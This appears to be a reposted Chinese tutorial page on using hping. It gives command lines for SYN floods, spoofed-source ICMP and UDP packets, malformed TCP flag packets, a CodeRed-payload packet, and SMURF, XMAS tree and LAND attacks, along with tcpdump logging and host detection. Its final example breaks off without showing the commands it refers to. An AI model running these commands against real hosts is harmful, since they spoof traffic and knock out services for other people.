Hping使用方法详解(2)
时间:2018-04-23 00:43 来源:网络整理 作者:墨客科技 点击:次
每秒送1个(-i u1000000)TCP(default)封包到的port 44444,伪造来源IP(-a)100.100.100.100使用的port为22222 hping –i u1000000 –a 100.100.100.100 –s 22222 –p 44444SYN Flooding(每秒10个封包) hping 目标主机IP –i u100000 –S –a 伪造来源IP伪造IP的ICMP封包(每秒10个封包) hping 目标主机IP –i u100000 –1 –a 伪造来源IP注:-1为数字非英文 不正常TCP Flag组合封包(每秒10个封包) (a)SYN+FIN hping 目标主机IP –i u100000 –S –F –a 伪造来源IP(b)X’mas hping 目标主机IP –i u100000 –F –S –R –P –A –U –a 伪造来源IP伪造IP的UDP封包 hping 目标主机IP –i u100000 –2 –a 伪造来源IP伪造IP内含CodeRed封包 hping 目标主机IP –i u100000 –d [封包datasize] –E [filename] –a [伪造来源IP]SMURF攻击 hping2 -1 -a 192.168.1.5 192.168.1.255XMAS TREE攻击 hping2 -SFRP 192.168.1.5LAND攻击 hping2 -k -S -s 25 -p 25 -a 192.168.1.5 192.168.1.5用tcpdump记录流量 #捕获25000个包,将原始报文转储到dumpfile中cron任务: 5 3 * * * /usr/sbin/tcpdump -c 25000 -w dumpfile -n#查看记录tcpdump -r dumpfile -X -vvPING失效后的主机检测: $ping 192.168.2.1PING 192.168.2.1 (192.168.2.1) 56(84) bytes of data. --- 192.168.2.1 ping statistics ---19 packets transmitted, 0 received, 100% packet loss, time 18009ms ------------------------------------------------$hping2 -c 4 -n -i 2 192.168.2.1HPING 192.168.2.1 (eth0 192.168.2.1): NO FLAGS are set, 40 essay-headers + 0 data bytes len=46 ip=192.168.2.1 ttl=64 id=43489 sport=0 flags=RA seq=0 win=0 rtt=1.0 ms len=46 ip=192.168.2.1 ttl=64 id=43490 sport=0 flags=RA seq=1 win=0 rtt=0.6 ms len=46 ip=192.168.2.1 ttl=64 id=43491 sport=0 flags=RA seq=2 win=0 rtt=0.7 ms len=46 ip=192.168.2.1 ttl=64 id=43498 sport=0 flags=RA seq=3 win=0 rtt=0.6 ms --- 192.168.2.1 hping statistic ---4 packets transmitted, 4 packets received, 0% packet loss round-trip min/avg/max = 0.6/0.8/1.0 ms-c 发送4个报文-n不进行名称解析 -i包发送时间间隔。 好处:即使主机阻塞了ICMP报文,也可以显示主机是否在运行的信息,在关掉ICMP的探测有效! 更复杂的实际的例子 step 1:目标主机安装了blackice,它的ip address是ip.add.of.victim 上面的三个命令干了同一件事情,以伪造的ip发送假的trinoo攻击数据包. (责任编辑:admin) |